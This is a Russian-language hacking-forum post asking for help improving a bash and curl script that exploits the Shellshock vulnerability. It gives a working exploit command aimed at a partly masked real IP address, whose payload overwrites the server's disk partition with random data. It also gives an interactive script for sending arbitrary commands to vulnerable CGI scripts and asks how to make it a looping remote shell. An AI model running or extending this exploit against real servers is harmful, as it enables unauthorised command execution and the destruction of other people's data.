ANTICHAT - bash+curl+shellshock

Всем здравия!

Есть вопрос по приведению в порядок скрипта для использования уязвимости, может даже кто-то поделится своим)

Метасплоит не всегда бывает под рукой да и его установка не везде возможна, а башем можно пользоваться почти везде где если линукс.

Вот пример работы shellshock

Код:

curl -i --insecure https://**.181.32.92/cgi-bin/index.cgi -A "() { :;};echo;dd if=/dev/random of=/dev/sda1 bs=4k"

Вот "пример" скрипта

Код:

echo  "Enter URI to cgi"

read vuln_cgi

echo "Enter cmd"

read send_cmd

curl -i -A "() { :;};echo;$send_cmd" $vuln_cgi

Вопрос:

Как после ввода команды для выполнения через shellshock скрипт не завершался, а ждал ввода новой команды

Также хотелось бы сделать выход из скрипта, например если ввести "Q"

Также столкнулся с проблемой , когда при выполнении запроса через уязвимость, после выполнения команды выводится код самого cgi скрипта и получается очень неудобно читать нужную часть вывода.

Есть ли возможность выводить текст , но до появления, например, "DOCTYPE" чтобы отсечь шелуху.